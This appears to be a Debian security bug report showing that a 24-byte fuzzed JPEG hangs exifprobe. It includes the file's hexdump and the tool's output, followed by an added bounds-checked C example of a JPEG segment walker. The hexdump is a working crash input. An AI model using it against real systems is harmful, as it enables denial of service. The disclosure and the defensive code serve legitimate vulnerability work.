Bug#779527: exifprobe: denial of service
Henri Salo
henri at nerv.fi
Sun Mar 1 21:34:33 UTC 2015
Package: exifprobe
Version: 2.0.1-3
Severity: important
Tags: security
The following attached sample file hangs exifprobe and uses all CPU from one core.
Sample file is fuzzed with american fuzzy lop <http://lcamtuf.coredump.cx/afl/>.
00000000 ff d8 ff e0 00 10 4a 46 49 46 4a 46 49 46 00 01 |......JFIFJFIF..|
00000010 00 01 00 00 ff ec 00 43 |.......C|
00000018
Starting program: exifprobe-2.0.1/exifprobe -c sample2.jpg
File Name = sample2.jpg
File Type = JPEG
File Size = 24
@000000000=0 : <JPEG_SOI>
@0x0000002=2 : <JPEG_APP0> 0xffe0 length 16, - (not dumped: use -A)
@0x0000013=19 : </JPEG_APP0>
@0x0000014=20 : <JPEG_APP12> 0xffec length 67, FAILED to read character at offset 24 (EOF)
- --
Henri Salo
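The output in the report stops at a segment at offset 20 that declares length 67 in a 24-byte file. The following is an added example, not exifprobe's code and not part of the original report: a JPEG marker walker that checks every declared segment length against the bytes remaining and returns at the first segment that runs past the end. All type and function names are hypothetical; `sample2` holds the 24 bytes from the hexdump above.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical result codes for this example. */
enum walk_status { WALK_OK, WALK_BAD_MARKER, WALK_BAD_LENGTH, WALK_TRUNCATED };

struct walk_result {
    enum walk_status status;
    size_t offset;      /* start of the segment where the walk stopped */
    unsigned marker;    /* marker read at that offset, 0 if none */
    unsigned length;    /* declared length of that segment, 0 if none */
    unsigned segments;  /* segments accepted before stopping */
};

/* The 24 bytes shown in the hexdump in the report. */
static const uint8_t sample2[24] = {
    0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10, 0x4a, 0x46, 0x49, 0x46, 0x4a, 0x46,
    0x49, 0x46, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0xff, 0xec, 0x00, 0x43
};

/* Walk marker segments up to SOS or EOI. Every read and every skip is checked
   against size, so each iteration either advances the offset or returns. */
struct walk_result walk_jpeg(const uint8_t *buf, size_t size)
{
    struct walk_result r = { WALK_OK, 0, 0, 0, 0 };
    size_t off = 0;
    while (off < size) {
        r.offset = off; r.marker = 0; r.length = 0;
        if (size - off < 2) { r.status = WALK_TRUNCATED; return r; }
        unsigned m = buf[off + 1];
        if (buf[off] != 0xff || m == 0x00 || m == 0xff) { r.status = WALK_BAD_MARKER; return r; }
        r.marker = 0xff00u | m;
        if (m == 0xd9) { r.segments++; return r; }          /* EOI: done */
        if (m == 0xd8 || m == 0x01 || (m >= 0xd0 && m <= 0xd7)) {
            off += 2; r.segments++; continue;                /* SOI, TEM, RSTn carry no length */
        }
        if (size - off < 4) { r.status = WALK_TRUNCATED; return r; }
        r.length = ((unsigned)buf[off + 2] << 8) | buf[off + 3];
        if (r.length < 2) { r.status = WALK_BAD_LENGTH; return r; }
        /* The length field counts its own two bytes; compare with what is left. */
        if (r.length > size - off - 2) { r.status = WALK_TRUNCATED; return r; }
        r.segments++;
        if (m == 0xda) return r;                             /* SOS: entropy-coded data follows */
        off += 2 + (size_t)r.length;
    }
    return r;   /* ran out of data on a segment boundary without EOI */
}

int main(void)
{
    struct walk_result r = walk_jpeg(sample2, sizeof sample2);
    printf("status=%d offset=%zu marker=0x%04x length=%u\n", (int)r.status, r.offset, r.marker, r.length);
    return r.status == WALK_OK ? 0 : 1;
}
```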